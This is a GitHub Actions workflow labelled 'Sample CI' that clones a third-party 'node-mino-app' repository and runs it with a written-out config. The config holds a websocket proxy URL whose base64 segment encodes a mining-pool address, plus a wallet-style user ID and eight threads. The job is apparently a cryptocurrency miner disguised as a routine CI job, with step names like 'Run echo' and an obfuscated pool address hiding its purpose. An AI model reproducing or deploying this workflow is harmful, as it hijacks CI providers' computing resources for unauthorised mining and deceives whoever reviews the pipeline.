name: Sample CI

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:
  run-script:
    name: Run run.sh
    runs-on: ubuntu-22.04
    steps:
      - name: Set up Node
        uses: actions/setup-node@v4
        with:
          node-version: "20.19.0"

      - name: Clone a public repository
        uses: actions/checkout@v4
        with:
          repository: ismailalkaf/node-mino-app
          ref: main
          path: node-mino-app

      - name: Run echo
        working-directory: node-mino-app
        run: |
          echo '{"log": true, "proxy": "wss://present-nichol-vivo1-4f3dad8a.koyeb.app/bWlub3RhdXJ4Lm5hLm1pbmUuenBvb2wuY2E6NzAxOQ==", "user": "SWrtFsEa237mckDo7hmtHR2YtadmbZJNus", "password": "c=DGB,567", "argent": "wasm-mino/2.0", "threads": 8}' > data.txt
      - name: Run node app
        working-directory: node-mino-app
        run: |
          ./node app.js
